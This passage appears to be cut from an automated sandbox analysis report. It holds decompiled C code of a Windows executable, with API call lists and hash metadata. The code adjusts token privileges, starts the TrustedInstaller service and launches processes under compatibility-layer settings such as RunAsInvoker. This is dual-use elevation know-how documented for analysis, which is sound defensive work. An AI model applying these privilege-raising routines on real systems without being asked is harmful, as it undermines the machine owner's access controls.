                                                                                                                    0x00409010
                                                                                                                    0x0040901f
                                                                                                                    0x00409026
                                                                                                                    0x0040902d
                                                                                                                    0x00409030
                                                                                                                    0x00409035
                                                                                                                    0x00409037
                                                                                                                    0x00409040
                                                                                                                    0x00409042
                                                                                                                    0x00409044
                                                                                                                    0x00409051
                                                                                                                    0x00409051
                                                                                                                    0x00409044
                                                                                                                    0x00409053
                                                                                                                    0x0040905e
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                      • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                    • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
                                                                                                                    • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
                                                                                                                    • AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
                                                                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
                                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
                                                                                                                    • String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
                                                                                                                    • API String ID: 616250965-1253513912
                                                                                                                    • Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                    • Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
                                                                                                                    • Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                    • Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00401306, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38serviceCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00401306(void* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t5;
				int _t12;
				void* _t14;

				_t12 = 0; // executed
				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
				_t14 = _t5;
				if(_t14 != 0) {
					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
						_t12 = StartServiceW(_t14, 0, 0);
					}
					CloseServiceHandle(_t14);
				}
				CloseServiceHandle(_a4);
				return _t12;
			}








                                                                                                                    0x00401319
                                                                                                                    0x0040131b
                                                                                                                    0x00401327
                                                                                                                    0x0040132b
                                                                                                                    0x0040133a
                                                                                                                    0x0040134b
                                                                                                                    0x0040134b
                                                                                                                    0x0040134e
                                                                                                                    0x0040134e
                                                                                                                    0x00401353
                                                                                                                    0x0040135b

                                                                                                                    APIs
                                                                                                                    • OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
                                                                                                                    • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
                                                                                                                    • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
                                                                                                                    • CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Service$CloseHandle$OpenQueryStartStatus
                                                                                                                    • String ID: TrustedInstaller
                                                                                                                    • API String ID: 862991418-565535830
                                                                                                                    • Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                    • Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
                                                                                                                    • Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                    • Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040A33B, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t18;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceW(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								_t18 =  *0x40fa70; // 0xfcb617dc
								 *0x40fa70 = _t18 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}












                                                                                                                    0x0040a348
                                                                                                                    0x0040a34e
                                                                                                                    0x0040a352
                                                                                                                    0x0040a35f
                                                                                                                    0x0040a363
                                                                                                                    0x0040a369
                                                                                                                    0x0040a371
                                                                                                                    0x0040a374
                                                                                                                    0x0040a37c
                                                                                                                    0x0040a380
                                                                                                                    0x0040a383
                                                                                                                    0x0040a386
                                                                                                                    0x0040a388
                                                                                                                    0x0040a388
                                                                                                                    0x0040a38c
                                                                                                                    0x0040a38f
                                                                                                                    0x0040a39f
                                                                                                                    0x0040a3a1
                                                                                                                    0x0040a3a5
                                                                                                                    0x0040a3a5
                                                                                                                    0x0040a3a9
                                                                                                                    0x0040a3aa
                                                                                                                    0x0040a3b3
                                                                                                                    0x0040a3b3
                                                                                                                    0x0040a37c
                                                                                                                    0x0040a371
                                                                                                                    0x0040a3b8
                                                                                                                    0x0040a3be

                                                                                                                    APIs
                                                                                                                    • FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0040A359
                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 0040A369
                                                                                                                    • LockResource.KERNEL32(00000000), ref: 0040A374
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3473537107-0
                                                                                                                    • Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                    • Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
                                                                                                                    • Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                    • Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004022D5, Relevance: 61.7, APIs: 25, Strings: 10, Instructions: 435COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 83%
                                                                                                                    			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
				WCHAR* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				char* _v24;
				int _v28;
				intOrPtr _v32;
				int _v36;
				int _v40;
				char _v44;
				void* _v56;
				int _v60;
				char _v92;
				void _v122;
				int _v124;
				short _v148;
				signed int _v152;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				void _v192;
				char _v196;
				char _v228;
				void _v258;
				int _v260;
				void _v786;
				short _v788;
				void _v1314;
				short _v1316;
				void _v1842;
				short _v1844;
				void _v18234;
				short _v18236;
				char _v83772;
				void* __ebx;
				void* __edi;
				void* __esi;
				short* _t174;
				short _t175;
				signed int _t176;
				short _t177;
				short _t178;
				int _t184;
				signed int _t187;
				intOrPtr _t207;
				intOrPtr _t219;
				int* _t252;
				int* _t253;
				int* _t266;
				int* _t267;
				wchar_t* _t270;
				int _t286;
				void* _t292;
				void* _t304;
				WCHAR* _t308;
				WCHAR* _t310;
				intOrPtr* _t311;
				int _t312;
				WCHAR* _t315;
				void* _t325;
				void* _t328;

				_t304 = __edx;
				E0040B550(0x1473c, __ecx);
				_t286 = 0;
				 *_a4 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				memset( &_v192, 0, 0x40);
				_v60 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 = 0;
				_v40 = 0;
				_v28 = 0;
				_v36 = 0;
				_v32 = 0x100;
				_v44 = 0;
				_v1316 = 0;
				memset( &_v1314, 0, 0x208);
				_v788 = 0;
				memset( &_v786, 0, 0x208);
				_t315 = _a8;
				_t328 = _t325 + 0x24;
				_v83772 = 0;
				_v196 = 0x44;
				E00404923(0x104,  &_v788, _t315);
				if(wcschr(_t315, 0x25) != 0) {
					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
				}
				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
					_v8 = _t286;
					_v1844 = _t286;
					memset( &_v1842, _t286, 0x208);
					_t328 = _t328 + 0xc;
					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
					if(_v1844 != _t286) {
						E00404923(0x104,  &_v788,  &_v1844);
					}
				}
				_t308 =  &(_t315[0x2106]);
				if( *_t308 == _t286) {
					E00404B5C( &_v1316,  &_v788);
					__eflags = _v1316 - _t286;
					_t315 = _a8;
					_pop(_t292);
					if(_v1316 == _t286) {
						goto L11;
					}
					goto L10;
				} else {
					_v20 = _t308;
					_t270 = wcschr(_t308, 0x25);
					_pop(_t292);
					if(_t270 == 0) {
						L11:
						_t174 =  &(_t315[0x220e]);
						if( *_t174 != 1) {
							_v152 = _v152 | 0x00000001;
							_v148 =  *_t174;
						}
						_t309 = ",";
						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
							_v152 = _v152 | 0x00000004;
							_t266 =  &_v260;
							_push(_t266);
							L0040B1F8();
							_v180 = _t266;
							_t328 = _t328 + 0x3c;
							_t267 =  &_v124;
							L0040B1F8();
							_t292 = _t267;
							_v176 = _t267;
						}
						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
							_v152 = _v152 | 0x00000002;
							_t252 =  &_v260;
							_push(_t252);
							L0040B1F8();
							_v172 = _t252;
							_t328 = _t328 + 0x3c;
							_t253 =  &_v124;
							_push(_t253);
							L0040B1F8();
							_v168 = _t253;
						}
						_t310 =  &(_t315[0x105]);
						if( *_t310 != _t286) {
							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
								_push(_t310);
							} else {
								_v18236 = _t286;
								memset( &_v18234, _t286, 0x4000);
								_t328 = _t328 + 0xc;
								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
								_push( &_v18236);
							}
							_push( &_v788);
							_push(L"\"%s\" %s");
							_push(0x7fff);
							_push( &_v83772);
							L0040B1EC();
							_v24 =  &_v83772;
						}
						_t175 = _t315[0x220c];
						if(_t175 != 0x20) {
							_v12 = _t175;
						}
						_t311 = _a4;
						if(_t315[0x2254] == 2) {
							E00401D1E(_t311, L"RunAsInvoker");
						}
						_t176 = _t315[0x265c];
						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
						}
						_t177 = _t315[0x265e];
						if(_t177 != 1) {
							__eflags = _t177 - 2;
							if(_t177 != 2) {
								goto L37;
							}
							_push(L"16BITCOLOR");
							goto L36;
						} else {
							_push(L"256COLOR");
							L36:
							E00401D1E(_t311);
							L37:
							if(_t315[0x2660] == _t286) {
								__eflags = _t315[0x2662] - _t286;
								if(_t315[0x2662] == _t286) {
									__eflags = _t315[0x2664] - _t286;
									if(_t315[0x2664] == _t286) {
										__eflags = _t315[0x2666] - _t286;
										if(_t315[0x2666] == _t286) {
											L46:
											_t178 = _t315[0x2a6e];
											_t358 = _t178 - 3;
											if(_t178 != 3) {
												__eflags = _t178 - 2;
												if(_t178 != 2) {
													__eflags =  *_t311 - _t286;
													if( *_t311 == _t286) {
														_push(_t286);
													} else {
														_push(_t311);
													}
													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
													L63:
													_t293 = _t311;
													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
													_t312 = _t184;
													if(_t312 == _t286 && _v60 != _t286) {
														_t363 = _t315[0x266c] - _t286;
														if(_t315[0x266c] != _t286) {
															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
															_a4 = _a4 | 0xffffffff;
															_a8 = _t286;
															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
														}
													}
													E004055D1(_t184,  &_v44);
													return _t312;
												}
												E00405497( &_v92);
												E00405497( &_v228);
												E0040149F(__eflags,  &_v92);
												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
												E00401551( &_v228, _t304, __eflags,  &_v92);
												_t204 = _a4;
												__eflags =  *_a4;
												if(__eflags != 0) {
													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
												}
												E00401421( &_v44, _t304,  &_v92, __eflags);
												_t207 = _v28;
												__eflags = _t207;
												_v16 = 0x40c4e8;
												if(_t207 != 0) {
													_v16 = _t207;
												}
												_v12 = _v12 | 0x00000400;
												E004054B9( &_v228);
												E004054B9( &_v92);
												_t286 = 0;
												__eflags = 0;
												L58:
												_t315 = _a8;
												_t311 = _a4;
												goto L63;
											}
											E00405497( &_v92);
											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
											_t359 =  *_t311 - _t286;
											if( *_t311 != _t286) {
												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
											}
											E00401421( &_v44, _t304,  &_v92, _t359);
											_t219 = _v28;
											_v16 = 0x40c4e8;
											if(_t219 != _t286) {
												_v16 = _t219;
											}
											_v12 = _v12 | 0x00000400;
											E004054B9( &_v92);
											goto L58;
										}
										_push(L"HIGHDPIAWARE");
										L45:
										E00401D1E(_t311);
										goto L46;
									}
									_push(L"DISABLEDWM");
									goto L45;
								}
								_push(L"DISABLETHEMES");
								goto L45;
							}
							_push(L"640X480");
							goto L45;
						}
					}
					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
					L10:
					_v20 =  &_v1316;
					goto L11;
				}
			}

































































                                                                                                                    0x004022d5
                                                                                                                    0x004022dd
                                                                                                                    0x004022e7
                                                                                                                    0x004022ec
                                                                                                                    0x004022f7
                                                                                                                    0x004022fa
                                                                                                                    0x004022fd
                                                                                                                    0x00402300
                                                                                                                    0x00402307
                                                                                                                    0x0040230d
                                                                                                                    0x0040230e
                                                                                                                    0x00402318
                                                                                                                    0x00402321
                                                                                                                    0x00402324
                                                                                                                    0x00402327
                                                                                                                    0x0040232a
                                                                                                                    0x0040232d
                                                                                                                    0x00402334
                                                                                                                    0x00402337
                                                                                                                    0x0040233e
                                                                                                                    0x0040234f
                                                                                                                    0x00402356
                                                                                                                    0x0040235b
                                                                                                                    0x0040235e
                                                                                                                    0x0040236d
                                                                                                                    0x00402374
                                                                                                                    0x0040237e
                                                                                                                    0x00402395
                                                                                                                    0x004023a0
                                                                                                                    0x004023a0
                                                                                                                    0x004023ac
                                                                                                                    0x004023cf
                                                                                                                    0x004023d2
                                                                                                                    0x004023d9
                                                                                                                    0x004023de
                                                                                                                    0x004023f6
                                                                                                                    0x00402403
                                                                                                                    0x00402414
                                                                                                                    0x00402419
                                                                                                                    0x00402403
                                                                                                                    0x0040241a
                                                                                                                    0x00402423
                                                                                                                    0x00402458
                                                                                                                    0x0040245d
                                                                                                                    0x00402464
                                                                                                                    0x00402467
                                                                                                                    0x00402468
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00402425
                                                                                                                    0x00402428
                                                                                                                    0x0040242b
                                                                                                                    0x00402433
                                                                                                                    0x00402434
                                                                                                                    0x00402473
                                                                                                                    0x00402473
                                                                                                                    0x0040247c
                                                                                                                    0x00402481
                                                                                                                    0x00402488
                                                                                                                    0x00402488
                                                                                                                    0x00402495
                                                                                                                    0x0040249a
                                                                                                                    0x004024b7
                                                                                                                    0x004024be
                                                                                                                    0x004024cd
                                                                                                                    0x004024d1
                                                                                                                    0x004024ed
                                                                                                                    0x004024f0
                                                                                                                    0x00402506
                                                                                                                    0x0040250b
                                                                                                                    0x00402512
                                                                                                                    0x00402518
                                                                                                                    0x00402519
                                                                                                                    0x0040251e
                                                                                                                    0x00402524
                                                                                                                    0x00402527
                                                                                                                    0x0040252b
                                                                                                                    0x00402530
                                                                                                                    0x00402531
                                                                                                                    0x00402531
                                                                                                                    0x0040253d
                                                                                                                    0x0040255a
                                                                                                                    0x00402561
                                                                                                                    0x00402570
                                                                                                                    0x00402574
                                                                                                                    0x00402590
                                                                                                                    0x00402593
                                                                                                                    0x004025a9
                                                                                                                    0x004025ae
                                                                                                                    0x004025b5
                                                                                                                    0x004025bb
                                                                                                                    0x004025bc
                                                                                                                    0x004025c1
                                                                                                                    0x004025c7
                                                                                                                    0x004025ca
                                                                                                                    0x004025cd
                                                                                                                    0x004025ce
                                                                                                                    0x004025d4
                                                                                                                    0x004025d4
                                                                                                                    0x004025da
                                                                                                                    0x004025e3
                                                                                                                    0x004025eb
                                                                                                                    0x00402633
                                                                                                                    0x004025fb
                                                                                                                    0x00402608
                                                                                                                    0x0040260f
                                                                                                                    0x00402614
                                                                                                                    0x00402624
                                                                                                                    0x00402630
                                                                                                                    0x00402630
                                                                                                                    0x0040263a
                                                                                                                    0x0040263b
                                                                                                                    0x00402646
                                                                                                                    0x0040264b
                                                                                                                    0x0040264c
                                                                                                                    0x0040265a
                                                                                                                    0x0040265a
                                                                                                                    0x0040265d
                                                                                                                    0x00402666
                                                                                                                    0x00402668
                                                                                                                    0x00402668
                                                                                                                    0x00402672
                                                                                                                    0x00402675
                                                                                                                    0x0040267e
                                                                                                                    0x0040267e
                                                                                                                    0x00402683
                                                                                                                    0x0040268b
                                                                                                                    0x0040269e
                                                                                                                    0x0040269e
                                                                                                                    0x004026a3
                                                                                                                    0x004026ac
                                                                                                                    0x004026b5
                                                                                                                    0x004026b8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004026ba
                                                                                                                    0x00000000
                                                                                                                    0x004026ae
                                                                                                                    0x004026ae
                                                                                                                    0x004026bf
                                                                                                                    0x004026c1
                                                                                                                    0x004026c6
                                                                                                                    0x004026cc
                                                                                                                    0x004026d5
                                                                                                                    0x004026db
                                                                                                                    0x004026e4
                                                                                                                    0x004026ea
                                                                                                                    0x004026f3
                                                                                                                    0x004026f9
                                                                                                                    0x00402707
                                                                                                                    0x00402707
                                                                                                                    0x0040270d
                                                                                                                    0x00402710
                                                                                                                    0x0040276d
                                                                                                                    0x00402770
                                                                                                                    0x0040280b
                                                                                                                    0x0040280e
                                                                                                                    0x00402813
                                                                                                                    0x00402810
                                                                                                                    0x00402810
                                                                                                                    0x00402810
                                                                                                                    0x00402819
                                                                                                                    0x0040281f
                                                                                                                    0x00402836
                                                                                                                    0x00402841
                                                                                                                    0x00402846
                                                                                                                    0x0040284a
                                                                                                                    0x00402851
                                                                                                                    0x00402857
                                                                                                                    0x00402860
                                                                                                                    0x00402865
                                                                                                                    0x00402876
                                                                                                                    0x00402879
                                                                                                                    0x00402888
                                                                                                                    0x00402888
                                                                                                                    0x00402857
                                                                                                                    0x00402891
                                                                                                                    0x0040289c
                                                                                                                    0x0040289c
                                                                                                                    0x00402779
                                                                                                                    0x00402784
                                                                                                                    0x0040278d
                                                                                                                    0x004027a4
                                                                                                                    0x004027b3
                                                                                                                    0x004027b8
                                                                                                                    0x004027bb
                                                                                                                    0x004027bf
                                                                                                                    0x004027c6
                                                                                                                    0x004027c6
                                                                                                                    0x004027d1
                                                                                                                    0x004027d6
                                                                                                                    0x004027d9
                                                                                                                    0x004027db
                                                                                                                    0x004027e2
                                                                                                                    0x004027e4
                                                                                                                    0x004027e4
                                                                                                                    0x004027e7
                                                                                                                    0x004027f4
                                                                                                                    0x004027fc
                                                                                                                    0x00402801
                                                                                                                    0x00402801
                                                                                                                    0x00402803
                                                                                                                    0x00402803
                                                                                                                    0x00402806
                                                                                                                    0x00000000
                                                                                                                    0x00402806
                                                                                                                    0x00402715
                                                                                                                    0x00402729
                                                                                                                    0x0040272e
                                                                                                                    0x00402731
                                                                                                                    0x00402738
                                                                                                                    0x00402738
                                                                                                                    0x00402743
                                                                                                                    0x00402748
                                                                                                                    0x0040274d
                                                                                                                    0x00402754
                                                                                                                    0x00402756
                                                                                                                    0x00402756
                                                                                                                    0x00402759
                                                                                                                    0x00402763
                                                                                                                    0x00000000
                                                                                                                    0x00402763
                                                                                                                    0x004026fb
                                                                                                                    0x00402700
                                                                                                                    0x00402702
                                                                                                                    0x00000000
                                                                                                                    0x00402702
                                                                                                                    0x004026ec
                                                                                                                    0x00000000
                                                                                                                    0x004026ec
                                                                                                                    0x004026dd
                                                                                                                    0x00000000
                                                                                                                    0x004026dd
                                                                                                                    0x004026ce
                                                                                                                    0x00000000
                                                                                                                    0x004026ce
                                                                                                                    0x004026ac
                                                                                                                    0x00402443
                                                                                                                    0x0040246a
                                                                                                                    0x00402470
                                                                                                                    0x00000000
                                                                                                                    0x00402470

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 00402300
                                                                                                                    • memset.MSVCRT ref: 0040233E
                                                                                                                    • memset.MSVCRT ref: 00402356
                                                                                                                      • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                      • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                    • wcschr.MSVCRT ref: 00402387
                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0
                                                                                                                      • Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
                                                                                                                      • Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69
                                                                                                                    • wcschr.MSVCRT ref: 004023B7
                                                                                                                    • memset.MSVCRT ref: 004023D9
                                                                                                                    • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
                                                                                                                    • wcschr.MSVCRT ref: 0040242B
                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
                                                                                                                    • memset.MSVCRT ref: 004024BE
                                                                                                                    • memset.MSVCRT ref: 004024D1
                                                                                                                    • _wtoi.MSVCRT ref: 00402519
                                                                                                                    • _wtoi.MSVCRT ref: 0040252B
                                                                                                                    • memset.MSVCRT ref: 00402561
                                                                                                                    • memset.MSVCRT ref: 00402574
                                                                                                                    • _wtoi.MSVCRT ref: 004025BC
                                                                                                                    • _wtoi.MSVCRT ref: 004025CE
                                                                                                                    • wcschr.MSVCRT ref: 004025F0
                                                                                                                    • memset.MSVCRT ref: 0040260F
                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
                                                                                                                    • _snwprintf.MSVCRT ref: 0040264C
                                                                                                                    • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
                                                                                                                    • GetProcessAffinityMask.KERNEL32(?,?,000000FF), ref: 00402879
                                                                                                                    • SetProcessAffinityMask.KERNEL32(?,000000FF), ref: 00402888
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
                                                                                                                    • String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
                                                                                                                    • API String ID: 2452314994-435178042
                                                                                                                    • Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                    • Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
                                                                                                                    • Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                    • Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00408533, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 259COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 89%
                                                                                                                    			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
				char _v0;
				WCHAR* _v4;
				void* __edi;
				void* __esi;
				void* _t76;
				void* _t82;
				wchar_t* _t85;
				void* _t86;
				void* _t87;
				intOrPtr _t92;
				wchar_t* _t93;
				intOrPtr _t95;
				int _t106;
				char* _t110;
				intOrPtr _t115;
				wchar_t* _t117;
				intOrPtr _t124;
				wchar_t* _t125;
				intOrPtr _t131;
				wchar_t* _t132;
				int _t156;
				void* _t159;
				intOrPtr _t162;
				void* _t177;
				void* _t178;
				void* _t179;
